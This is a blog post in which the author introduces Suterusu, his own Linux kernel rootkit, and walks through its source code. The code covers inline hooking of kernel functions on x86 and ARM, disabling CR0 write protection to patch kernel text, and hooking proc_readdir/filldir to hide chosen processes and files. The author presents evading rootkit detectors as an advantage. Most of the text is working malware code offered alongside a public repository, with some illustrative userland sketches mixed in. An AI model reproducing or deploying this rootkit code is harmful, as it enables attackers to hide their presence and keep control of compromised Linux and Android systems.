Introduction

A number of months ago, I added a new project to GitHub showcasing some code I worked on over the summer (https://github.com/mncoppola/suterusu).

Through my various router persistence and kernel exploitation adventures, I’ve taken a recent interest in Linux kernel rootkits and what makes them tick. I did some searching around mainly in the packetstorm.org archive and whatever blogs turned up, but to my surprise there really wasn’t much to be found in the realm of modern public Linux rootkits. The most prominent results centered around adore-ng, which hasn’t been updated since 2007 (at least, from the looks of it), and a few miscellaneous names like suckit, kbeast, and Phalanx. A lot changes in the kernel from year to year, and I was hoping for something a little more recent.

So, like most of my projects, I said “screw it” and opened vim. I’ll write my own rootkit designed to work on modern systems and architectures, and I’ll learn how they work through the act of doing it myself. I’d like to (formally) introduce you to Suterusu, my personal kernel rootkit project targeting Linux 2.6 and 3.x on x86 and ARM.

There’s a lot to talk about in the way of techniques, design, and implementation, but I’ll start out with some of the basics. Suterusu currently sports a large array of features, with many more in staging, but it may be more appropriate to devote separate blog posts to these.

Function Hooking in Suterusu

Most rootkits traditionally perform system call hooking by swapping out function pointers in the system call table, but this technique is well known and trivially detectable by intelligent rootkit detectors. Instead of pursuing this route, Suterusu utilizes a different technique and performs hooking by modifying the prologue of the target function to transfer execution to the replacement routine. This can be observed by examining the following four functions:

hijack_start()

hijack_pause()

hijack_resume()

hijack_stop()

These functions track hooks through a linked list of sym_hook structs, defined as:

    struct sym_hook {
        void *addr;
        unsigned char o_code[HIJACK_SIZE];
        unsigned char n_code[HIJACK_SIZE];
        struct list_head list;
    };

    LIST_HEAD(hooked_syms);

To fully understand the hooking process, let’s step through some code.

Function Hooking on x86

Most of the weight is carried by the hijack_start() function, which takes as arguments pointers to the target routine and the “hook-with” routine:

    void hijack_start ( void *target, void *new )
    {
        struct sym_hook *sa;
        unsigned char o_code[HIJACK_SIZE], n_code[HIJACK_SIZE];
        unsigned long o_cr0;

        // push $addr; ret
        memcpy(n_code, "\x68\x00\x00\x00\x00\xc3", HIJACK_SIZE);
        *(unsigned long *)&n_code[1] = (unsigned long)new;

        memcpy(o_code, target, HIJACK_SIZE);

        o_cr0 = disable_wp();
        memcpy(target, n_code, HIJACK_SIZE);
        restore_wp(o_cr0);

        sa = kmalloc(sizeof(*sa), GFP_KERNEL);
        if ( ! sa )
            return;

        sa->addr = target;
        memcpy(sa->o_code, o_code, HIJACK_SIZE);
        memcpy(sa->n_code, n_code, HIJACK_SIZE);

        list_add(&sa->list, &hooked_syms);
    }

A small shellcode buffer is initialized with a “push dword 0; ret” sequence, and the pushed value is then patched with the address of the hook-with function. HIJACK_SIZE bytes (the size of the shellcode) are saved from the start of the target function, and the prologue is then overwritten with the patched shellcode. From this point on, every call to the target function is redirected to our hook-with function.
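To make the byte layout concrete, here is a minimal userland sketch of how the six-byte sequence is assembled. It only fills an ordinary byte array and never executes or writes to code. The names build_push_ret() and looks_like_push_ret() are illustrative and not part of Suterusu, and HIJACK_SIZE is assumed to be 6 as on 32-bit x86. The second helper shows the naive pattern a detector might look for at a function's first bytes.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

#define HIJACK_SIZE 6 /* assumed: opcode 0x68 + 4-byte immediate + 0xc3 */

/* Fill out[] with "push imm32; ret", where imm32 is addr in little-endian
 * byte order, as x86 immediates are encoded. */
void build_push_ret(unsigned char out[HIJACK_SIZE], uint32_t addr)
{
    static const unsigned char tmpl[HIJACK_SIZE] = { 0x68, 0, 0, 0, 0, 0xc3 };

    assert(out != NULL);
    memcpy(out, tmpl, HIJACK_SIZE);
    out[1] = (unsigned char)(addr & 0xff);
    out[2] = (unsigned char)((addr >> 8) & 0xff);
    out[3] = (unsigned char)((addr >> 16) & 0xff);
    out[4] = (unsigned char)((addr >> 24) & 0xff);
}

/* Naive check: do the first six bytes have the push/ret shape?
 * Hypothetical helper; a real detector would need far more care. */
int looks_like_push_ret(const unsigned char *code)
{
    return code[0] == 0x68 && code[5] == 0xc3;
}
```

Writing the immediate byte by byte avoids the unaligned, type-punned store used in the kernel code, which is fine there but not portable C.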

The final step is to store the target function pointer, original code, and hook code to the linked list of hooks, thus completing the operation. The remaining hijack functions operate on this linked list.

hijack_pause() uninstalls the desired hook temporarily:

    void hijack_pause ( void *target )
    {
        struct sym_hook *sa;

        list_for_each_entry ( sa, &hooked_syms, list )
            if ( target == sa->addr )
            {
                unsigned long o_cr0 = disable_wp();
                memcpy(target, sa->o_code, HIJACK_SIZE);
                restore_wp(o_cr0);
            }
    }

hijack_resume() reinstalls the hook:

    void hijack_resume ( void *target )
    {
        struct sym_hook *sa;

        list_for_each_entry ( sa, &hooked_syms, list )
            if ( target == sa->addr )
            {
                unsigned long o_cr0 = disable_wp();
                memcpy(target, sa->n_code, HIJACK_SIZE);
                restore_wp(o_cr0);
            }
    }

hijack_stop() uninstalls the hook and deletes it from the linked list:

    void hijack_stop ( void *target )
    {
        struct sym_hook *sa;

        list_for_each_entry ( sa, &hooked_syms, list )
            if ( target == sa->addr )
            {
                unsigned long o_cr0 = disable_wp();
                memcpy(target, sa->o_code, HIJACK_SIZE);
                restore_wp(o_cr0);

                list_del(&sa->list);
                kfree(sa);
                break;
            }
    }
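The bookkeeping behind these four routines can be tried out safely in userland by pointing it at a plain data buffer instead of a function. The sketch below is an illustration under assumptions, not the Suterusu source: the rec_* names and struct hook_rec are made up, a hand-rolled singly linked list stands in for the kernel's list_head, and HIJACK_SIZE is assumed to be 6. Unlike the kernel version, it allocates the record before touching the target, so an allocation failure leaves the buffer unmodified.

```c
#include <assert.h>
#include <stdlib.h>
#include <string.h>

#define HIJACK_SIZE 6 /* assumed value, matching the x86 sequence */

/* Userland stand-in for struct sym_hook; `next` replaces list_head. */
struct hook_rec {
    void *addr;
    unsigned char o_code[HIJACK_SIZE];
    unsigned char n_code[HIJACK_SIZE];
    struct hook_rec *next;
};

static struct hook_rec *hooks;

static struct hook_rec *rec_find(void *target)
{
    struct hook_rec *r;

    for (r = hooks; r; r = r->next)
        if (r->addr == target)
            return r;
    return NULL;
}

/* Save the original bytes, apply the patch, remember both. */
int rec_start(void *target, const unsigned char *patch)
{
    struct hook_rec *r;

    assert(target && patch);
    r = malloc(sizeof(*r));
    if (!r)
        return -1;
    r->addr = target;
    memcpy(r->o_code, target, HIJACK_SIZE);
    memcpy(r->n_code, patch, HIJACK_SIZE);
    memcpy(target, patch, HIJACK_SIZE);
    r->next = hooks;
    hooks = r;
    return 0;
}

/* Temporarily put the original bytes back. */
int rec_pause(void *target)
{
    struct hook_rec *r = rec_find(target);

    if (!r)
        return -1;
    memcpy(target, r->o_code, HIJACK_SIZE);
    return 0;
}

/* Reapply the saved patch. */
int rec_resume(void *target)
{
    struct hook_rec *r = rec_find(target);

    if (!r)
        return -1;
    memcpy(target, r->n_code, HIJACK_SIZE);
    return 0;
}

/* Restore the original bytes and forget the record. */
int rec_stop(void *target)
{
    struct hook_rec **pp;

    for (pp = &hooks; *pp; pp = &(*pp)->next) {
        if ((*pp)->addr == target) {
            struct hook_rec *r = *pp;

            memcpy(target, r->o_code, HIJACK_SIZE);
            *pp = r->next;
            free(r);
            return 0;
        }
    }
    return -1;
}
```

Calling rec_start() on an eight-byte buffer, then rec_pause(), rec_resume(), and rec_stop(), should leave the buffer exactly as it began, and bytes beyond HIJACK_SIZE are never touched.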

Write Protection on x86

Since kernel text pages are marked read-only, attempting to overwrite a function prologue in this region of memory will produce a kernel oops. This protection may be trivially circumvented, however, by clearing the WP bit (bit 16) in the cr0 register, which disables write protection on the CPU. Wikipedia’s article on control registers confirms this property:

    BIT   NAME   FULL NAME       DESCRIPTION
    16    WP     Write protect   Determines whether the CPU can write to pages marked read-only

The WP bit will need to be cleared and restored at multiple points in the code, so it makes programmatic sense to abstract the operations. The following code originates from the PaX project, specifically from the native_pax_open_kernel() and native_pax_close_kernel() routines. Extra caution is taken to prevent a potential race condition caused by unlucky scheduling on SMP systems, as explained in a blog post by Dan Rosenberg:

    inline unsigned long disable_wp ( void )
    {
        unsigned long cr0;

        preempt_disable();
        barrier();

        cr0 = read_cr0();
        write_cr0(cr0 & ~X86_CR0_WP);
        return cr0;
    }

    inline void restore_wp ( unsigned long cr0 )
    {
        write_cr0(cr0);

        barrier();
        preempt_enable_no_resched();
    }
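The masking step in disable_wp() is plain bit arithmetic and can be checked in isolation. The sketch below is userland C that operates on an ordinary integer, not on the real register. CR0_WP mirrors the kernel's X86_CR0_WP (bit 16); the helper names are illustrative only.

```c
#include <assert.h>
#include <stdint.h>

#define CR0_WP_BIT 16
#define CR0_WP     (UINT64_C(1) << CR0_WP_BIT) /* same value as X86_CR0_WP */

/* Return the value disable_wp() would write: cr0 with only WP cleared. */
uint64_t cr0_clear_wp(uint64_t cr0)
{
    assert(CR0_WP == 0x10000); /* sanity check on the mask value */
    return cr0 & ~CR0_WP;
}

/* Report whether the WP bit is set in a given cr0 value. */
int cr0_wp_is_set(uint64_t cr0)
{
    return (cr0 & CR0_WP) != 0;
}
```

Because disable_wp() returns the unmodified value and restore_wp() writes it back verbatim, every other bit in the register is preserved across the pair.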

Function Hooking on ARM

A number of significant changes exist in the hijack_* set of hooking routines depending on whether the code is compiled for x86 or ARM. For instance, the concept of a WP bit does not exist on ARM while special care must be taken to handle data and instruction caching introduced by the architecture. While the concepts of data and instruction caching do exist on the x86 and x86_64 architectures, such features did not pose an obstacle during development.

Modified to address these new architectural characteristics is a version of hijack_start() specific to ARM:

    void hijack_start ( void *target, void *new )
    {
        struct sym_hook *sa;
        unsigned char o_code[HIJACK_SIZE], n_code[HIJACK_SIZE];

        if ( (unsigned long)target % 4 == 0 )
        {
            // ldr pc, [pc, #0]; .long addr; .long addr
            memcpy(n_code, "\x00\xf0\x9f\xe5\x00\x00\x00\x00\x00\x00\x00\x00", HIJACK_SIZE);
            *(unsigned long *)&n_code[4] = (unsigned long)new;
            *(unsigned long *)&n_code[8] = (unsigned long)new;
        }
        else // Thumb
        {
            // add r0, pc, #4; ldr r0, [r0, #0]; mov pc, r0; mov pc, r0; .long addr
            memcpy(n_code, "\x01\xa0\x00\x68\x87\x46\x87\x46\x00\x00\x00\x00", HIJACK_SIZE);
            *(unsigned long *)&n_code[8] = (unsigned long)new;
            target--;
        }

        memcpy(o_code, target, HIJACK_SIZE);

        memcpy(target, n_code, HIJACK_SIZE);
        cacheflush(target, HIJACK_SIZE);

        sa = kmalloc(sizeof(*sa), GFP_KERNEL);
        if ( ! sa )
            return;

        sa->addr = target;
        memcpy(sa->o_code, o_code, HIJACK_SIZE);
        memcpy(sa->n_code, n_code, HIJACK_SIZE);

        list_add(&sa->list, &hooked_syms);
    }

As displayed above, shellcodes for ARM and Thumb are included to redirect execution, similar to those on x86/_64.
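One detail of the ARM-mode sequence that is easy to miss: in ARM state, reading pc yields the address of the current instruction plus 8, so "ldr pc, [pc, #0]" at offset 0 loads the word at offset 8 of the patch. The word at offset 4 is never read and simply pads the gap. The sketch below lays the twelve bytes out in a plain array to show this. It is a userland illustration with made-up helper names, and ARM_HIJACK_SIZE is assumed to be 12 to match the string literal above.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

#define ARM_HIJACK_SIZE 12 /* assumed: one instruction + two address words */

/* Store a 32-bit value in little-endian byte order. */
static void put_le32(unsigned char *p, uint32_t v)
{
    p[0] = (unsigned char)(v & 0xff);
    p[1] = (unsigned char)((v >> 8) & 0xff);
    p[2] = (unsigned char)((v >> 16) & 0xff);
    p[3] = (unsigned char)((v >> 24) & 0xff);
}

/* Lay out: ldr pc, [pc, #0] (0xe59ff000); .long addr; .long addr */
void build_arm_patch(unsigned char out[ARM_HIJACK_SIZE], uint32_t addr)
{
    assert(out != NULL);
    put_le32(out, 0xe59ff000u);
    put_le32(out + 4, addr); /* padding: skipped by the pc+8 read */
    put_le32(out + 8, addr); /* the word the ldr actually loads */
}

/* Offset read by a pc-relative ldr located at insn_off with immediate imm. */
unsigned arm_ldr_source_offset(unsigned insn_off, unsigned imm)
{
    return insn_off + 8 + imm;
}
```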

Instruction Caching on ARM

Most Android devices do not enforce read-only kernel page permissions, so at least for now we can forgo any potential voodoo magic to write to protected memory regions. It is still necessary, however, to consider the concept of instruction caching on ARM when performing a function hook.

ARM CPUs utilize a data cache and instruction cache for performance benefits. However, modifying code in-place may cause the instruction cache to become incoherent with the actual instructions in memory. According to the official ARM technical reference, this issue becomes readily apparent when developing self-modifying code. The solution is to simply flush the instruction cache whenever a modification to kernel text is made, which is accomplished by a call to the kernel routine flush_icache_range():

    void cacheflush ( void *begin, unsigned long size )
    {
        flush_icache_range((unsigned long)begin, (unsigned long)begin + size);
    }

Pros and Cons of Inline Hooking

As with most techniques, inline function hooking presents various benefits and detriments when compared to simply hijacking the system call table:

Pro: Any function may be hijacked, not just system calls.

Pro: Less commonly implemented in rootkits, so it is less likely to be detected by rootkit detectors. It is also easy to circumvent simple hook detection engines due to the flexibility of assembly languages. A variety of detection evasion techniques for x86 may be found in the article x86 API Hooking Demystified.

Pro: Inline function hooking may be applied to userland with minimal/no modification. While working on the Android port of DMTCP, an application checkpointing tool out of Northeastern’s HPC lab, it was possible to simply copy and paste the entirety of the hijack_* routines, modified only to use userland linked lists.

Con: The current hooking implementation is not thread-safe. By temporarily unhooking a function via hijack_pause(), a race window is opened for other threads to execute the unhooked function before hijack_resume() is called. Potential solutions include crafty use of locking and permanently hijacking the target function and inserting extra logic within the hook-with routine. However, with the latter option, special care must be taken when executing the original function prologue on architectures characterized by variable-length instructions (x86/_64) and PC/IP-relative addressing (x86_64 and ARM).

Con: Another harmful possibility in the current implementation is hook recursion. This is more an issue of poor implementation than an insurmountable design flaw: there are various easy solutions to the problem of a hook-with function accidentally calling the hooked function itself, which leads to infinite recursion. Great information on the topic and proof of concept code can (once again) be found in the article x86 API Hooking Demystified.
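One of the simpler answers to the recursion problem is a re-entrancy flag, sketched below in ordinary userland C. This is an illustration under assumptions rather than anything Suterusu does: a function pointer named entry stands in for the hooked function's entry point, all names are hypothetical, and the flag is a single global, so it is not thread-safe (real code would need per-thread or per-CPU state).

```c
#include <assert.h>
#include <stddef.h>

static int in_hook;    /* set while the hook body is running */
int calls_to_original; /* counts how often the real function ran */

/* The "real" function that is being hooked. */
int original(int x)
{
    calls_to_original++;
    return x + 1;
}

int hook(int x);

/* Stand-in for the patched entry point: every call lands in hook(). */
int (*entry)(int) = hook;

int hook(int x)
{
    int r;

    assert(entry != NULL);

    /* Re-entered from inside the hook: pass straight through. */
    if (in_hook)
        return original(x);

    in_hook = 1;
    r = entry(x) * 2; /* goes through the hooked entry point again */
    in_hook = 0;
    return r;
}
```

Without the flag, the call through entry inside hook() would never terminate. With it, hook(3) runs original() exactly once and doubles the result.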

Hiding Processes, Files, and Directories

Once a reliable hooking “framework” is implemented, it’s fairly trivial to start intercepting interesting functions and doing interesting things. One of the most basic things a rootkit must do is hide processes and filesystem objects, both of which may be accomplished with the same basic technique.

In the Linux kernel, one or more instances of the file_operations struct are associated with each supported filesystem (usually one instance for files and one for directories, but dig into the kernel source code and you’ll find that filesystems are a certain kind of special). These structs contain pointers to the routines associated with different file operations, for instance reading, writing, mmap’ing, modifying permissions, etc. For explicatory purposes, we will examine the instantiation of the file_operations struct on ext3 for directory objects:

    const struct file_operations ext3_dir_operations = {
        .llseek         = generic_file_llseek,
        .read           = generic_read_dir,
        .readdir        = ext3_readdir,
        .unlocked_ioctl = ext3_ioctl,
    #ifdef CONFIG_COMPAT
        .compat_ioctl   = ext3_compat_ioctl,
    #endif
        .fsync          = ext3_sync_file,
        .release        = ext3_release_dir,
    };

To hide an object on the filesystem, it is possible to simply hook the readdir function and filter out any undesired items from its output. To maintain a level of system agnosticism, Suterusu dynamically obtains the pointer to a filesystem’s active readdir routine by navigating the target object’s file struct:

    void *get_vfs_readdir ( const char *path )
    {
        void *ret;
        struct file *filep;

        /* filp_open() reports failure with an ERR_PTR value, never NULL */
        filep = filp_open(path, O_RDONLY, 0);
        if ( IS_ERR(filep) )
            return NULL;

        ret = filep->f_op->readdir;
        filp_close(filep, 0);

        return ret;
    }

The actual hook process (for hiding items in /proc) looks like:

    #if LINUX_VERSION_CODE > KERNEL_VERSION(2, 6, 30)
    proc_readdir = get_vfs_readdir("/proc");
    #endif

    hijack_start(proc_readdir, &n_proc_readdir);

The kernel version check is in response to a change implemented in version 2.6.31 that removes the exported proc_readdir() symbol from include/linux/proc_fs.h. In previous versions it was possible to simply retrieve the pointer value externally upon linking, but rootkit developers are now forced to obtain it by alternate, manual means.

To perform the actual hiding of objects in /proc, Suterusu hooks proc_readdir() with the following routine:

    static int (*o_proc_filldir)(void *__buf, const char *name, int namelen, loff_t offset, u64 ino, unsigned d_type);

    int n_proc_readdir ( struct file *file, void *dirent, filldir_t filldir )
    {
        int ret;

        o_proc_filldir = filldir;

        hijack_pause(proc_readdir);
        ret = proc_readdir(file, dirent, &n_proc_filldir);
        hijack_resume(proc_readdir);

        return ret;
    }

The real heavy lifting occurs in the filldir function, which serves as a callback executed for each item in the directory. This is replaced with a malicious n_proc_filldir() function, as follows:

    static int n_proc_filldir( void *__buf, const char *name, int namelen, loff_t offset, u64 ino, unsigned d_type )
    {
        struct hidden_proc *hp;
        char *endp;
        long pid;

        pid = simple_strtol(name, &endp, 10);

        list_for_each_entry ( hp, &hidden_procs, list )
            if ( pid == hp->pid )
                return 0;

        return o_proc_filldir(__buf, name, namelen, offset, ino, d_type);
    }

Since the intention is to hide processes by hijacking the readdir/filldir routines of /proc, Suterusu simply performs a match of the object name against a linked list of all PIDs the user wishes to hide. If a match is found, the callback returns 0 and the item is hidden from the directory listing. Otherwise, the original proc_filldir() function is executed and its value returned.
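The callback-wrapping pattern itself is not kernel-specific, and its name matching can be examined in userland. The sketch below is a toy model with hypothetical names (fill_fn, filtering_fill, count_fill, and the PID list are all made up). It also tightens one detail: the routine above ignores endp, so any non-numeric name parses as 0, whereas this version only treats a name as a PID when the whole string is decimal digits.

```c
#include <assert.h>
#include <stddef.h>
#include <stdlib.h>

/* Simplified stand-in for filldir_t: just a buffer and an entry name. */
typedef int (*fill_fn)(void *buf, const char *name);

static const long hidden_pids[] = { 1337, 4242 }; /* hypothetical list */

fill_fn next_fill; /* the callback that was originally passed in */
int seen;          /* entries that reached the original callback */

/* Example downstream callback: just counts what it is shown. */
int count_fill(void *buf, const char *name)
{
    (void)buf;
    (void)name;
    seen++;
    return 0;
}

/* Return 1 and store the PID only if name is entirely decimal digits. */
int name_to_pid(const char *name, long *pid)
{
    char *end;

    if (*name < '0' || *name > '9')
        return 0;
    *pid = strtol(name, &end, 10);
    return *end == '\0';
}

/* Wrapper callback: drop matching entries, forward everything else. */
int filtering_fill(void *buf, const char *name)
{
    long pid;
    size_t i;

    assert(next_fill != NULL);
    if (name_to_pid(name, &pid))
        for (i = 0; i < sizeof(hidden_pids) / sizeof(hidden_pids[0]); i++)
            if (pid == hidden_pids[i])
                return 0; /* swallow the entry */

    return next_fill(buf, name);
}
```

Feeding it the names "1", "1337", "self", and "1337x" with next_fill set to count_fill forwards three of the four entries; only the exact match "1337" is dropped.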

This same concept applies for hiding files and directories, except a direct string match against the object name is performed instead of converting the PID name to a number type first:

    static int n_root_filldir( void *__buf, const char *name, int namelen, loff_t offset, u64 ino, unsigned d_type )
    {
        struct hidden_file *hf;

        list_for_each_entry ( hf, &hidden_files, list )
            if ( ! strcmp(name, hf->name) )
                return 0;

        return o_root_filldir(__buf, name, namelen, offset, ino, d_type);
    }